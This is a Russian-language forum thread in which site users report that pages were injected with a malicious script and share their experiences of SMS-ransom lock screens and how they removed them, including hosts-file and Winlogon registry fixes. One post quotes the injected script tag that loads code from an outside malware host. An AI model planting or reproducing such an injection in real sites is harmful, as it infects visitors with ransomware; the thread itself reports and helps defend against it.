Внимание, страшный ВИРУС на Проконях!!!

[Nastenok]

Только что поймала вирус. :shock:
Подозрительная на внедрение вируса срочка в коде страницы вот:

<script language="JavaScript" type="text/javascript" src="http://goldtmu.info/inf.php?7736x19151"></script>

Пишу с компа мужа из под альтернативной ОС семейства Linux. Моему компу уже похоже ППЦ :|

Сначала данный код ведёт на поддельную страницу Одноклассников или Вконтакте, где просит денег через SMS за якобы заблокированную учётку. Потом лезут порнобаннеры, которые полностью блокируют работу на компе!

Прошу админов сайта как можно скорее разобраться с этой проблемой :!:

 

[Фаворитка]

У меня примерно тоже самое было в контакте. Сначала пробовала зайти на страницу-не дает, говорит, что найден вирус. Скажу сразу-у меня аваст стоит. Так вот, прерываю соединение со страницей. Так раз 6.
В итоге выключила комп. вечером врубаю, а на экране по цетру голые девушки и над ними написано- "Спасибо за установку нашего баннера!" Я ничего не устанавливала! Пробую удалить- имеется кнопка "удалить баннер". Не фига- пишут "отправте 2 смс, стоимостью от 300 руб." Конечно, ничего не отправляю. В инет эта хрень вылести не дает, страницы автоматом все закрываются.
Хорошо, что у меня есть мой папа! Со своего компа нашел в поисковике "как удалить порно баннер". Удалил каким то образом. Еле-еле :shock:
Я была просто в шоке, когда попыталась зайти в контакт и мне опать аваст ловит вирус :!: Я просто в осадок выпала! Помог поисковик-"контакт вирус". Удалили!!! :wink: Я безумно рада! Но теперь такая же фигня со всеми сайтами оказывается... :cry:
Не расстраивайтесь насчет своего компа-все норм будет. Попробуйте найти " Как удалить порно баннер". Вдруг получится... Искренне сочувствую :|

 

[Nastenok]

Рецепт избавления от требования SMS на разблокировку аккаунтов vkontakte.ru и odnoklassniki (не помогает от порнобаннера).

В файле \windows\system32\drivers\etc\hosts
стереть всё, кроме строки '127.0.0.1 localhost' и строк, начинающихся с # (решётки). Потом сохранить.

 

[Nastenok]

Мой комп уже вылечен, благо муж сисадмин в доме имеется :lol:
Но зловредный код с Проконей всё же лучше удалить. Уже написала в "личку" админам. :wink:

 

[Н969РВ]

У меня тоже висит баннер. Удалить не могу, хотя прочитала про все способы. В документе хост нет вообще ни одной строки, он пустой. Из папок ничего не удаляется, просто комп виснет. Написано что баннер установлен на 48 часов, вот жду.

 

[golowuk]

И у меня таже история, только у меня висит 3-и сутки и убираться не думает.

 

[Nastenok]

Мой комп был вылечен за 10 мин. загрузкой Windows с внешнего носителя (Windows PE/ERD Commander) путём правки оттуда реестра и удаления файла трояна. Прямо из заражённой системы лечить крайне проблемно тк обычно блокируется доступ к regedit и/или всё исправленное тут же восстанавливается.

Путь к ключу реестра:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

Значение параметра Userinit должно быть таким:
"C:\WINDOWS\system32\userinit.exe,"
При порнобаннере оно такое:
"C:\WINDOWS\system32\userinit.exe, XXXXX.exe"
где XXXXX - случайное имя, которое будет разным у разных пользователей.

Потом файл с таким же названием (cюда_подставьте_ваше_случайное_имя.exe) нужно найти в компе поиском и удалить.

 

[Nastenok]

Само оно не уйдёт, нужно лечение
После лечения стоит пользоваться Интернетом из-под учётной записи без прав администратора.

 

[Фаворитка]

За 48 часов ничего не удалится-развод это все. Потом скажут, что через 56 часов удалить можно будет. Лечите компы.

Сочувствую всем... :roll:

 

[Nastenok]

Мои сообщения модераторам почему-то таки и висят в "Исходящих", не уходят. А вирусня на Проконях процветает! Сайт уже внёсён в чёрный список и зайти на главную страницу ни Мазилла Файрфокс ни Гугл Хром категорически не разрешает! Спокойно хожу только по форумам. :roll:

 

[Nastenok]

Интересно, администраторы форума в этот раздел заглядывают хоть иногда? :evil:

И собираются как-то очищать сайт от вредоносного ПО?

 

[Vulpecula]

у меня такое же,но только на Firefox,а на Internet Explorer все нормально..

 

[CraDy]

И у мя уже тоже второй день FireFox не дает спокойно зайти на форум Пишет, что сайт атакует компьютеры... Приходится заходить с IE...

 

[_Anhen_]

Vulpecula, CraDy, с IE все нормально, потому что это не браузер, а не пойми что. Он заражения просто не видит (это не значит, что опасности нет). Так что слушайтесь FireFox, а еще лучше - файрвол поставьте.

 

[Александра84]

у меня такое же,но только на Firefox,а на Internet Explorer все нормально..

У меня та же беда :cry:

 

[kalipso (julia)]

ужас! сайтом невозможно пользоваться =(( Google Chrome на каждой странице такое предупреждение выдает =(((

 

[Фаворитка]

А у меня все нормально. Explorer дает нормально пользоваться сайтом. ТТТ...

 

[Gurken]

А у меня все нормально. Explorer дает нормально пользоваться сайтом. ТТТ...

радоваться тут нечему, см посты выше. Я тоже зашла с IE на свой страх и риск....с работы :roll:

 

[Фаворитка]

Я смотрела все, что написано выше. У меня уже был вирус и его удалили.
Вот и сижу на свой страх и риск...

 

[посторонний]

Пользуюсь осликом, но проверил сейчас файрфоксом (старым, правда) - всё нормально и в обычном и в безопасном режиме. Антивирусник молчит, файрвол тоже...

Гляньте, на всякий, в файле c:\WINDOWS\system32\drivers\etc\hosts (бнз расширения) нет ли какой записи для prokoni.ru или (мало вероятно) для IP 83.222.2.175 . Возможно, это вовсе не сайт виноват :wink: